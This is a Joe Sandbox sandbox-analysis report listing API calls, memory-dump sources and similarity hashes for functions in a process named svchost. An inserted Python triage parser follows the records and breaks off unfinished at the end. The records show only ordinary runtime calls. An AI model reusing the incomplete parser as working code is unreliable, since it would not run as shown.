                                                            • Opcode Fuzzy Hash: e8aadc3c8c83e940c738cc529458cc8926bc1e15d33530c0e8e84ee7bc9425a6
                                                            • Instruction Fuzzy Hash: 96F0B432585928B7DBA25A65AC26B5E3748FB61773B188122FC08E7190CB20DD0986E1
                                                            APIs
                                                            • GetProcAddress.KERNEL32(00000000,?), ref: 00853C3F
                                                            Memory Dump Source
                                                            • Source File: 00000002.00000002.2107591889.0000000000831000.00000020.00000001.01000000.00000006.sdmp, Offset: 00830000, based on PE: true
                                                            • Associated: 00000002.00000002.2107577820.0000000000830000.00000002.00000001.01000000.00000006.sdmp
                                                            • Associated: 00000002.00000002.2107616904.0000000000863000.00000002.00000001.01000000.00000006.sdmp
                                                            • Associated: 00000002.00000002.2107639557.000000000086E000.00000004.00000001.01000000.00000006.sdmp
                                                            • Associated: 00000002.00000002.2107639557.0000000000875000.00000004.00000001.01000000.00000006.sdmp
                                                            • Associated: 00000002.00000002.2107639557.0000000000892000.00000004.00000001.01000000.00000006.sdmp
                                                            • Associated: 00000002.00000002.2107965623.0000000000893000.00000002.00000001.01000000.00000006.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_2_2_830000_svchost.jbxd
                                                            Similarity
                                                            • API ID: AddressProc
                                                            • String ID:
                                                            • API String ID: 190572456-0
                                                            • Opcode ID: 02a0fe49b2edadf4160227866b4f510985ffbb00c618098a66dbe79b08b2f0c1
                                                            • Instruction ID: 01364d83c77d33bc333a7c88a756190247b194064fd35ada5e4b6d0a3b1c17e0
                                                            • Opcode Fuzzy Hash: 02a0fe49b2edadf4160227866b4f510985ffbb00c618098a66dbe79b08b2f0c1
                                                            • Instruction Fuzzy Hash: 80F0E5362042169FCF119EA8FC0099A77A9FF11BA37144125FE05E71D0EB31DE28C7A0
                                                            APIs
                                                            • RtlAllocateHeap.NTDLL(00000000,?,00000000,?,0085CA2C,00000000,?,00856CBE,?,00000008,?,008591E0,?,?,?), ref: 00858E38
                                                            Memory Dump Source
                                                            • Source File: 00000002.00000002.2107591889.0000000000831000.00000020.00000001.01000000.00000006.sdmp, Offset: 00830000, based on PE: true
                                                            • Associated: 00000002.00000002.2107577820.0000000000830000.00000002.00000001.01000000.00000006.sdmp
                                                            • Associated: 00000002.00000002.2107616904.0000000000863000.00000002.00000001.01000000.00000006.sdmp
                                                            • Associated: 00000002.00000002.2107639557.000000000086E000.00000004.00000001.01000000.00000006.sdmp
                                                            • Associated: 00000002.00000002.2107639557.0000000000875000.00000004.00000001.01000000.00000006.sdmp
                                                            • Associated: 00000002.00000002.2107639557.0000000000892000.00000004.00000001.01000000.00000006.sdmp
                                                            • Associated: 00000002.00000002.2107965623.0000000000893000.00000002.00000001.01000000.00000006.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_2_2_830000_svchost.jbxd
                                                            Similarity
                                                            • API ID: AllocateHeap
                                                            • String ID:
                                                            • API String ID: 1279760036-0
                                                            • Opcode ID: ff3b02db1b9f20a172a547d28a10515df157fe3423dd2a06b9bd54ab612c4061
                                                            • Instruction ID: 2aa370d41b1c6e5978949adbb55b58f5e2fa2fab82188bd4e63c6b700d425aba
                                                            • Opcode Fuzzy Hash: ff3b02db1b9f20a172a547d28a10515df157fe3423dd2a06b9bd54ab612c4061
                                                            • Instruction Fuzzy Hash: 4AE06535206125D6EA7236659C07B5F7668FB417B7F150113EC59F6191DF60CC0882E1
                                                            APIs
                                                            • __EH_prolog.LIBCMT ref: 00835AC2
                                                              • Part of subcall function 0083B505: __EH_prolog.LIBCMT ref: 0083B50A
                                                            Memory Dump Source
                                                            • Source File: 00000002.00000002.2107591889.0000000000831000.00000020.00000001.01000000.00000006.sdmp, Offset: 00830000, based on PE: true
                                                            • Associated: 00000002.00000002.2107577820.0000000000830000.00000002.00000001.01000000.00000006.sdmp
                                                            • Associated: 00000002.00000002.2107616904.0000000000863000.00000002.00000001.01000000.00000006.sdmp
                                                            • Associated: 00000002.00000002.2107639557.000000000086E000.00000004.00000001.01000000.00000006.sdmp
                                                            • Associated: 00000002.00000002.2107639557.0000000000875000.00000004.00000001.01000000.00000006.sdmp
                                                            • Associated: 00000002.00000002.2107639557.0000000000892000.00000004.00000001.01000000.00000006.sdmp
                                                            • Associated: 00000002.00000002.2107965623.0000000000893000.00000002.00000001.01000000.00000006.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_2_2_830000_svchost.jbxd
                                                            Similarity
                                                            • API ID: H_prolog
                                                            • String ID:
                                                            • API String ID: 3519838083-0
                                                            • Opcode ID: f44261e0b565ba9d17aba26491fcd8ed291ca16c866714d90bfff7ac5f579df3
                                                            • Instruction ID: 652fbc91a5d5561b6d38a22b2444205677e21443acfa45c4c38bec9e8572a4f2
                                                            • Opcode Fuzzy Hash: f44261e0b565ba9d17aba26491fcd8ed291ca16c866714d90bfff7ac5f579df3
                                                            • Instruction Fuzzy Hash: 72016D30410798DAD715E7ACC041BDEB7A4EF64304F51848EA55693282CBB41B08DAA3
                                                            APIs
                                                              • Part of subcall function 0083A69B: FindFirstFileW.KERNELBASE(?,?,?,?,?,?,0083A592,000000FF,?,?), ref: 0083A6C4
                                                              • Part of subcall function 0083A69B: FindFirstFileW.KERNELBASE(?,?,?,?,00000800,?,?,?,?,0083A592,000000FF,?,?), ref: 0083A6F2
                                                              • Part of subcall function 0083A69B: GetLastError.KERNEL32(?,?,00000800,?,?,?,?,0083A592,000000FF,?,?), ref: 0083A6FE
                                                            • FindClose.KERNELBASE(00000000,000000FF,?,?), ref: 0083A598
                                                            Memory Dump Source
                                                            • Source File: 00000002.00000002.2107591889.0000000000831000.00000020.00000001.01000000.00000006.sdmp, Offset: 00830000, based on PE: true
                                                            • Associated: 00000002.00000002.2107577820.0000000000830000.00000002.00000001.01000000.00000006.sdmp
                                                            • Associated: 00000002.00000002.2107616904.0000000000863000.00000002.00000001.01000000.00000006.sdmp
                                                            • Associated: 00000002.00000002.2107639557.000000000086E000.00000004.00000001.01000000.00000006.sdmp
                                                            • Associated: 00000002.00000002.2107639557.0000000000875000.00000004.00000001.01000000.00000006.sdmp
                                                            • Associated: 00000002.00000002.2107639557.0000000000892000.00000004.00000001.01000000.00000006.sdmp
                                                            • Associated: 00000002.00000002.2107965623.0000000000893000.00000002.00000001.01000000.00000006.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_2_2_830000_svchost.jbxd
                                                            Similarity
                                                            • API ID: Find$FileFirst$CloseErrorLast
                                                            • String ID:
                                                            • API String ID: 1464966427-0
                                                            • Opcode ID: 0fe17d9dbf207a4ed389549831ae3b472a601096da33650ed295bed6e246a6f7
                                                            • Instruction ID: 88c0b87c0504d60a01c1d66c0680098554df814f267fb1ae24b3d9f95244dd10
                                                            • Opcode Fuzzy Hash: 0fe17d9dbf207a4ed389549831ae3b472a601096da33650ed295bed6e246a6f7
                                                            • Instruction Fuzzy Hash: 96F08231009790AACB6657F88905BCB7B90BF9A331F048A4DF1FD92196C27550989BA3
                                                            APIs
                                                            • SetThreadExecutionState.KERNEL32(00000001), ref: 00840E3D
                                                            Memory Dump Source
                                                            • Source File: 00000002.00000002.2107591889.0000000000831000.00000020.00000001.01000000.00000006.sdmp, Offset: 00830000, based on PE: true
                                                            • Associated: 00000002.00000002.2107577820.0000000000830000.00000002.00000001.01000000.00000006.sdmp
                                                            • Associated: 00000002.00000002.2107616904.0000000000863000.00000002.00000001.01000000.00000006.sdmp
                                                            • Associated: 00000002.00000002.2107639557.000000000086E000.00000004.00000001.01000000.00000006.sdmp
                                                            • Associated: 00000002.00000002.2107639557.0000000000875000.00000004.00000001.01000000.00000006.sdmp
                                                            • Associated: 00000002.00000002.2107639557.0000000000892000.00000004.00000001.01000000.00000006.sdmp
                                                            • Associated: 00000002.00000002.2107965623.0000000000893000.00000002.00000001.01000000.00000006.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_2_2_830000_svchost.jbxd
                                                            Similarity
                                                            • API ID: ExecutionStateThread
                                                            • String ID:
                                                            • API String ID: 2211380416-0
                                                            • Opcode ID: ec1dc56f85d5568f063b232fe3e9f5cf36e7a4cea036ad15bf3bb0f41eb28425
                                                            • Instruction ID: 0ec92f0ee6758979e7b7e33a4362e1e3eea5aa954efee4b3c804a57a2bfe4ff3
                                                            • Opcode Fuzzy Hash: ec1dc56f85d5568f063b232fe3e9f5cf36e7a4cea036ad15bf3bb0f41eb28425
                                                            • Instruction Fuzzy Hash: 9DD0C210A0105926DE11332C281D7FF2A06FFC6320F0D0026F249D7582DF6848C6B2A3
                                                            APIs
                                                            • GdipAlloc.GDIPLUS(00000010), ref: 0084A62C
                                                              • Part of subcall function 0084A3B9: GdipCreateBitmapFromStreamICM.GDIPLUS(?,?), ref: 0084A3DA
                                                            Memory Dump Source
                                                            • Source File: 00000002.00000002.2107591889.0000000000831000.00000020.00000001.01000000.00000006.sdmp, Offset: 00830000, based on PE: true
                                                            • Associated: 00000002.00000002.2107577820.0000000000830000.00000002.00000001.01000000.00000006.sdmp
                                                            • Associated: 00000002.00000002.2107616904.0000000000863000.00000002.00000001.01000000.00000006.sdmp
                                                            • Associated: 00000002.00000002.2107639557.000000000086E000.00000004.00000001.01000000.00000006.sdmp
                                                            • Associated: 00000002.00000002.2107639557.0000000000875000.00000004.00000001.01000000.00000006.sdmp
                                                            • Associated: 00000002.00000002.2107639557.0000000000892000.00000004.00000001.01000000.00000006.sdmp
                                                            • Associated: 00000002.00000002.2107965623.0000000000893000.00000002.00000001.01000000.00000006.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_2_2_830000_svchost.jbxd
                                                            Similarity
                                                            • API ID: Gdip$AllocBitmapCreateFromStream
                                                            • String ID:
                                                            • API String ID: 1915507550-0
                                                            • Opcode ID: 04de48f4da0057d5573094f8f1391eb8b680834ec636c82e70e38579218699a2
                                                            • Instruction ID: 78c28273b4630af07485178c4cdefef3f012ca98335e2352433457e503dc84e5
                                                            • Opcode Fuzzy Hash: 04de48f4da0057d5573094f8f1391eb8b680834ec636c82e70e38579218699a2
                                                            • Instruction Fuzzy Hash: 7FD0A97028020CBADF0AAF25CC0296E7A99FB20744F008021B842E9282FBB1D910A267
                                                            APIs
                                                            • DloadProtectSection.DELAYIMP ref: 0084E5E3
                                                            Memory Dump Source
                                                            • Source File: 00000002.00000002.2107591889.0000000000831000.00000020.00000001.01000000.00000006.sdmp, Offset: 00830000, based on PE: true
                                                            • Associated: 00000002.00000002.2107577820.0000000000830000.00000002.00000001.01000000.00000006.sdmp
                                                            • Associated: 00000002.00000002.2107616904.0000000000863000.00000002.00000001.01000000.00000006.sdmp
                                                            • Associated: 00000002.00000002.2107639557.000000000086E000.00000004.00000001.01000000.00000006.sdmp
                                                            • Associated: 00000002.00000002.2107639557.0000000000875000.00000004.00000001.01000000.00000006.sdmp
                                                            • Associated: 00000002.00000002.2107639557.0000000000892000.00000004.00000001.01000000.00000006.sdmp
                                                            • Associated: 00000002.00000002.2107965623.0000000000893000.00000002.00000001.01000000.00000006.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_2_2_830000_svchost.jbxd
                                                            Similarity
                                                            • API ID: DloadProtectSection
                                                            • String ID:
                                                            • API String ID: 2203082970-0
                                                            • Opcode ID: 2fe690f195a6585e2c4204e0975233fbe84db2f16c10086735774065a9d40f75
                                                            • Instruction ID: 00bbb3fd71941a42fb6dc678da032fe0d2e7c0f7028e032c6e90b01bf3821b9d
                                                            • Opcode Fuzzy Hash: 2fe690f195a6585e2c4204e0975233fbe84db2f16c10086735774065a9d40f75
                                                            • Instruction Fuzzy Hash: A1D012B01C42499BDF02FFACA84B7143354F33471DF990112F155E1591DBA84880C606
                                                            APIs
                                                            • GetFileType.KERNELBASE(000000FF,008397BE), ref: 008398C8
                                                            Memory Dump Source
                                                            • Source File: 00000002.00000002.2107591889.0000000000831000.00000020.00000001.01000000.00000006.sdmp, Offset: 00830000, based on PE: true
                                                            • Associated: 00000002.00000002.2107577820.0000000000830000.00000002.00000001.01000000.00000006.sdmp
                                                            • Associated: 00000002.00000002.2107616904.0000000000863000.00000002.00000001.01000000.00000006.sdmp
                                                            • Associated: 00000002.00000002.2107639557.000000000086E000.00000004.00000001.01000000.00000006.sdmp
                                                            • Associated: 00000002.00000002.2107639557.0000000000875000.00000004.00000001.01000000.00000006.sdmp
                                                            • Associated: 00000002.00000002.2107639557.0000000000892000.00000004.00000001.01000000.00000006.sdmp
                                                            • Associated: 00000002.00000002.2107965623.0000000000893000.00000002.00000001.01000000.00000006.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_2_2_830000_svchost.jbxd
                                                            Similarity
                                                            • API ID: FileType
                                                            • String ID:
                                                            • API String ID: 3081899298-0
                                                            • Opcode ID: cb7fea3d210a5a91923b734a905178f6dce4bc963e1489cad592cdd47c520ff6
                                                            • Instruction ID: de60a56655dd4b47521f27863a5f5a34cde489a4ff4693bf254e97db97cf5995
                                                            • Opcode Fuzzy Hash: cb7fea3d210a5a91923b734a905178f6dce4bc963e1489cad592cdd47c520ff6
                                                            • Instruction Fuzzy Hash: 7DC00234404505958E2156259845095B711FAD3365BB496A4D0A9C54B1C3A2CC57EE51
                                                            APIs
                                                            • ___delayLoadHelper2@8.DELAYIMP ref: 0084E1E3
                                                              • Part of subcall function 0084E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0084E8D0
                                                              • Part of subcall function 0084E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0084E8E1
                                                            Memory Dump Source
                                                            • Source File: 00000002.00000002.2107591889.0000000000831000.00000020.00000001.01000000.00000006.sdmp, Offset: 00830000, based on PE: true
                                                            • Associated: 00000002.00000002.2107577820.0000000000830000.00000002.00000001.01000000.00000006.sdmp
                                                            • Associated: 00000002.00000002.2107616904.0000000000863000.00000002.00000001.01000000.00000006.sdmp
                                                            • Associated: 00000002.00000002.2107639557.000000000086E000.00000004.00000001.01000000.00000006.sdmp
                                                            • Associated: 00000002.00000002.2107639557.0000000000875000.00000004.00000001.01000000.00000006.sdmp
                                                            • Associated: 00000002.00000002.2107639557.0000000000892000.00000004.00000001.01000000.00000006.sdmp
                                                            • Associated: 00000002.00000002.2107965623.0000000000893000.00000002.00000001.01000000.00000006.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_2_2_830000_svchost.jbxd
                                                            Similarity
                                                            • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                            • String ID:
                                                            • API String ID: 1269201914-0
                                                            • Opcode ID: bc0866f250d2360ba4bf184f2ade6f09f6b5f60c0dd65cca97e9b29eb808f2fc
                                                            • Instruction ID: cfceeff5d35500fdbc29d04699059bb9c139577bc30f1f94ae5c4268ed3a180a
                                                            • Opcode Fuzzy Hash: bc0866f250d2360ba4bf184f2ade6f09f6b5f60c0dd65cca97e9b29eb808f2fc
                                                            • Instruction Fuzzy Hash: BCB012D929810CBC350431892C07C37110CF0C5B15330843EFC52C0480D840BD040432
                                                            APIs
                                                            • ___delayLoadHelper2@8.DELAYIMP ref: 0084E1E3
                                                              • Part of subcall function 0084E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0084E8D0
                                                              • Part of subcall function 0084E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0084E8E1
                                                            Memory Dump Source
                                                            • Source File: 00000002.00000002.2107591889.0000000000831000.00000020.00000001.01000000.00000006.sdmp, Offset: 00830000, based on PE: true
                                                            • Associated: 00000002.00000002.2107577820.0000000000830000.00000002.00000001.01000000.00000006.sdmp
                                                            • Associated: 00000002.00000002.2107616904.0000000000863000.00000002.00000001.01000000.00000006.sdmp
                                                            • Associated: 00000002.00000002.2107639557.000000000086E000.00000004.00000001.01000000.00000006.sdmp
                                                            • Associated: 00000002.00000002.2107639557.0000000000875000.00000004.00000001.01000000.00000006.sdmp
                                                            • Associated: 00000002.00000002.2107639557.0000000000892000.00000004.00000001.01000000.00000006.sdmp
                                                            • Associated: 00000002.00000002.2107965623.0000000000893000.00000002.00000001.01000000.00000006.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_2_2_830000_svchost.jbxd
                                                            Similarity
                                                            • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                            • String ID:
                                                            • API String ID: 1269201914-0
                                                            • Opcode ID: 188c7a1c4a7d8393752526786454bd13496d6eb86be3e7f88c33f4caa517748d
                                                            • Instruction ID: 3296b5536677d20f962a8dce5196f963592ae56592f3469383cb78735f336d29
                                                            • Opcode Fuzzy Hash: 188c7a1c4a7d8393752526786454bd13496d6eb86be3e7f88c33f4caa517748d
                                                            • Instruction Fuzzy Hash: 1CB012D529C10CAC3544718D2C07C37110CF0C4B15330403EF856C0190D8407D040632
                                                            APIs
                                                            • ___delayLoadHelper2@8.DELAYIMP ref: 0084E1E3
                                                              • Part of subcall function 0084E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0084E8D0
                                                              • Part of subcall function 0084E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0084E8E1
                                                            Memory Dump Source
                                                            • Source File: 00000002.00000002.2107591889.0000000000831000.00000020.00000001.01000000.00000006.sdmp, Offset: 00830000, based on PE: true
                                                            • Associated: 00000002.00000002.2107577820.0000000000830000.00000002.00000001.01000000.00000006.sdmp
                                                            • Associated: 00000002.00000002.2107616904.0000000000863000.00000002.00000001.01000000.00000006.sdmp
                                                            • Associated: 00000002.00000002.2107639557.000000000086E000.00000004.00000001.01000000.00000006.sdmp
                                                            • Associated: 00000002.00000002.2107639557.0000000000875000.00000004.00000001.01000000.00000006.sdmp
                                                            • Associated: 00000002.00000002.2107639557.0000000000892000.00000004.00000001.01000000.00000006.sdmp
                                                            • Associated: 00000002.00000002.2107965623.0000000000893000.00000002.00000001.01000000.00000006.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_2_2_830000_svchost.jbxd
                                                            Similarity
                                                            • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                            • String ID:
                                                            • API String ID: 1269201914-0
                                                            • Opcode ID: ac32d947c2659e789ae02060813be356f5d113bf7c1b33b7403cbe97f6019fc2
                                                            • Instruction ID: ac93438cdb072e7bb3bd68d4cee4dba06406045220358ca0a27051a23d41a2f3
                                                            • Opcode Fuzzy Hash: ac32d947c2659e789ae02060813be356f5d113bf7c1b33b7403cbe97f6019fc2
                                                            • Instruction Fuzzy Hash: 21B012D529800CAD354476492C07C37110CF0C5B11330C03EFC56C0280D840BC080532
                                                            APIs
                                                            • ___delayLoadHelper2@8.DELAYIMP ref: 0084E1E3
                                                              • Part of subcall function 0084E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0084E8D0
                                                              • Part of subcall function 0084E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0084E8E1
                                                            Memory Dump Source
                                                            • Source File: 00000002.00000002.2107591889.0000000000831000.00000020.00000001.01000000.00000006.sdmp, Offset: 00830000, based on PE: true
                                                            • Associated: 00000002.00000002.2107577820.0000000000830000.00000002.00000001.01000000.00000006.sdmp
                                                            • Associated: 00000002.00000002.2107616904.0000000000863000.00000002.00000001.01000000.00000006.sdmp
                                                            • Associated: 00000002.00000002.2107639557.000000000086E000.00000004.00000001.01000000.00000006.sdmp
                                                            • Associated: 00000002.00000002.2107639557.0000000000875000.00000004.00000001.01000000.00000006.sdmp
                                                            • Associated: 00000002.00000002.2107639557.0000000000892000.00000004.00000001.01000000.00000006.sdmp
                                                            • Associated: 00000002.00000002.2107965623.0000000000893000.00000002.00000001.01000000.00000006.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_2_2_830000_svchost.jbxd
                                                            Similarity
                                                            • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                            • String ID:
                                                            • API String ID: 1269201914-0
                                                            • Opcode ID: 1b1aa5c46bc34f757573fe00e983a1faf5a944fc5c82e35103a1e70265f28b1e
                                                            • Instruction ID: 0c3667694d7e0e9466dd029ee8170bdc973b3daf08e466094cf1cd4bf023d233
                                                            • Opcode Fuzzy Hash: 1b1aa5c46bc34f757573fe00e983a1faf5a944fc5c82e35103a1e70265f28b1e
                                                            • Instruction Fuzzy Hash: 3EB012E129800CAC354471492D07C37518CF0C4B11330403EF856C0180EC407D050532
                                                            APIs
                                                            • ___delayLoadHelper2@8.DELAYIMP ref: 0084EAF9
                                                              • Part of subcall function 0084E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0084E8D0
                                                              • Part of subcall function 0084E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0084E8E1
                                                            Memory Dump Source
                                                            • Source File: 00000002.00000002.2107591889.0000000000831000.00000020.00000001.01000000.00000006.sdmp, Offset: 00830000, based on PE: true
                                                            • Associated: 00000002.00000002.2107577820.0000000000830000.00000002.00000001.01000000.00000006.sdmp
                                                            • Associated: 00000002.00000002.2107616904.0000000000863000.00000002.00000001.01000000.00000006.sdmp
                                                            • Associated: 00000002.00000002.2107639557.000000000086E000.00000004.00000001.01000000.00000006.sdmp
                                                            • Associated: 00000002.00000002.2107639557.0000000000875000.00000004.00000001.01000000.00000006.sdmp
                                                            • Associated: 00000002.00000002.2107639557.0000000000892000.00000004.00000001.01000000.00000006.sdmp
                                                            • Associated: 00000002.00000002.2107965623.0000000000893000.00000002.00000001.01000000.00000006.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_2_2_830000_svchost.jbxd
                                                            Similarity
                                                            • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                            • String ID:
                                                            • API String ID: 1269201914-0
                                                            • Opcode ID: d829c87bfe50537babf41892b17a78f11d890c16d4daf6a692116fcdd43ceb9e
                                                            • Instruction ID: 33d18cb141a90f0f28d04e3a1b293530e53077584125491bfbb4818a3991949a
                                                            • Opcode Fuzzy Hash: d829c87bfe50537babf41892b17a78f11d890c16d4daf6a692116fcdd43ceb9e
                                                            • Instruction Fuzzy Hash: 68B012C629A45E7D3D04B2455D06C37410CF1E0B90330813EF511C4081DC800C050432
                                                            APIs
                                                            • ___delayLoadHelper2@8.DELAYIMP ref: 0084E1E3
                                                              • Part of subcall function 0084E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0084E8D0
                                                              • Part of subcall function 0084E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0084E8E1
                                                            Memory Dump Source
                                                            • Source File: 00000002.00000002.2107591889.0000000000831000.00000020.00000001.01000000.00000006.sdmp, Offset: 00830000, based on PE: true
                                                            • Associated: 00000002.00000002.2107577820.0000000000830000.00000002.00000001.01000000.00000006.sdmp
                                                            • Associated: 00000002.00000002.2107616904.0000000000863000.00000002.00000001.01000000.00000006.sdmp
                                                            • Associated: 00000002.00000002.2107639557.000000000086E000.00000004.00000001.01000000.00000006.sdmp
                                                            • Associated: 00000002.00000002.2107639557.0000000000875000.00000004.00000001.01000000.00000006.sdmp
                                                            • Associated: 00000002.00000002.2107639557.0000000000892000.00000004.00000001.01000000.00000006.sdmp
                                                            • Associated: 00000002.00000002.2107965623.0000000000893000.00000002.00000001.01000000.00000006.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_2_2_830000_svchost.jbxd
                                                            Similarity
                                                            • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                            • String ID:
                                                            • API String ID: 1269201914-0
                                                            • Opcode ID: 340ecbc3ff60d9a5a6fb056bfef7676e1cc74ff5051cd9f474975d2a291264cc
                                                            • Instruction ID: 3ddbdd508e1b34fd4070361f9b154c50dc08b9ff26761ff89a2e7a5b80b573aa
                                                            • Opcode Fuzzy Hash: 340ecbc3ff60d9a5a6fb056bfef7676e1cc74ff5051cd9f474975d2a291264cc
                                                            • Instruction Fuzzy Hash: D2B012D139814CBD358472492C07C37110CF0C4B11330813FF856C0280D8407C480532
                                                            APIs
                                                            • ___delayLoadHelper2@8.DELAYIMP ref: 0084E1E3
                                                              • Part of subcall function 0084E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0084E8D0
                                                              • Part of subcall function 0084E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0084E8E1
                                                            Memory Dump Source
                                                            • Source File: 00000002.00000002.2107591889.0000000000831000.00000020.00000001.01000000.00000006.sdmp, Offset: 00830000, based on PE: true
                                                            • Associated: 00000002.00000002.2107577820.0000000000830000.00000002.00000001.01000000.00000006.sdmp
                                                            • Associated: 00000002.00000002.2107616904.0000000000863000.00000002.00000001.01000000.00000006.sdmp
                                                            • Associated: 00000002.00000002.2107639557.000000000086E000.00000004.00000001.01000000.00000006.sdmp
                                                            • Associated: 00000002.00000002.2107639557.0000000000875000.00000004.00000001.01000000.00000006.sdmp
                                                            • Associated: 00000002.00000002.2107639557.0000000000892000.00000004.00000001.01000000.00000006.sdmp
                                                            • Associated: 00000002.00000002.2107965623.0000000000893000.00000002.00000001.01000000.00000006.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_2_2_830000_svchost.jbxd
                                                            Similarity
                                                            • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                            • String ID:
                                                            • API String ID: 1269201914-0
                                                            • Opcode ID: a2c8a2e81d44c2260798ee75858525d7bb2e388babba9c86fd7fcebbf52f5829
                                                            • Instruction ID: 58c5a48d75a4a41c0bdfb3d0290314585e2b944080cbdc7d71f78d210af1e4c4
                                                            • Opcode Fuzzy Hash: a2c8a2e81d44c2260798ee75858525d7bb2e388babba9c86fd7fcebbf52f5829
                                                            • Instruction Fuzzy Hash: 50B012D129C00CAD354472492D07C37510CF0C4B11330803EF856C0280DC507D0D0532
                                                            APIs
                                                            • ___delayLoadHelper2@8.DELAYIMP ref: 0084E1E3
                                                              • Part of subcall function 0084E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0084E8D0
                                                              • Part of subcall function 0084E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0084E8E1
                                                            Memory Dump Source
                                                            • Source File: 00000002.00000002.2107591889.0000000000831000.00000020.00000001.01000000.00000006.sdmp, Offset: 00830000, based on PE: true
                                                            • Associated: 00000002.00000002.2107577820.0000000000830000.00000002.00000001.01000000.00000006.sdmp
                                                            • Associated: 00000002.00000002.2107616904.0000000000863000.00000002.00000001.01000000.00000006.sdmp
                                                            • Associated: 00000002.00000002.2107639557.000000000086E000.00000004.00000001.01000000.00000006.sdmp
                                                            • Associated: 00000002.00000002.2107639557.0000000000875000.00000004.00000001.01000000.00000006.sdmp
                                                            • Associated: 00000002.00000002.2107639557.0000000000892000.00000004.00000001.01000000.00000006.sdmp
                                                            • Associated: 00000002.00000002.2107965623.0000000000893000.00000002.00000001.01000000.00000006.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_2_2_830000_svchost.jbxd
                                                            Similarity
                                                            • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                            • String ID:
                                                            • API String ID: 1269201914-0
                                                            • Opcode ID: 70add2cbe2d86db94cab5831dcbcc2fd802e19e0195e8730522c4f681d90393c
                                                            • Instruction ID: a84626d96cee2c32c41c29bb1138d1e2faf893284dc97e6112a4d0dbdd0661e8
                                                            • Opcode Fuzzy Hash: 70add2cbe2d86db94cab5831dcbcc2fd802e19e0195e8730522c4f681d90393c
                                                            • Instruction Fuzzy Hash: 97B012E529800CFC354471492C0BC37110CF0C5F11330803EFC56C0180D840BD040532
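An added example, not part of the Joe Sandbox report or its tooling: a small Python parser for the per-function records in this section. It reads the "APIs" bullets and the "Similarity" fields, separates the MSVC delay-load runtime thunks (calls into the DELAYIMP module, including the repeated ___delayLoadHelper2@8 entries) from functions whose direct API calls are worth reading by hand, and counts how many records share an API String ID. The report excerpt embedded in the block is constructed from five of the records on this page; the heading set, the regular expression and the RUNTIME_MODULES set are assumptions of this example, not Joe Sandbox definitions.

```python
"""Triage Joe Sandbox per-function records: runtime boilerplate vs. calls worth reviewing.

Added example, not part of the report or of Joe Sandbox. SAMPLE_REPORT is a
constructed excerpt in the report's own layout.
"""
import re
from collections import Counter

SAMPLE_REPORT = """\
APIs
• GdipAlloc.GDIPLUS(00000010), ref: 0084A62C
  • Part of subcall function 0084A3B9: GdipCreateBitmapFromStreamICM.GDIPLUS(?,?), ref: 0084A3DA
Similarity
• API ID: Gdip$AllocBitmapCreateFromStream
• String ID:
• API String ID: 1915507550-0
APIs
• DloadProtectSection.DELAYIMP ref: 0084E5E3
Similarity
• API ID: DloadProtectSection
• API String ID: 2203082970-0
APIs
• GetFileType.KERNELBASE(000000FF,008397BE), ref: 008398C8
Similarity
• API ID: FileType
• API String ID: 3081899298-0
APIs
• ___delayLoadHelper2@8.DELAYIMP ref: 0084E1E3
  • Part of subcall function 0084E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0084E8D0
  • Part of subcall function 0084E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0084E8E1
Similarity
• API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
• API String ID: 1269201914-0
APIs
• ___delayLoadHelper2@8.DELAYIMP ref: 0084EAF9
  • Part of subcall function 0084E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0084E8D0
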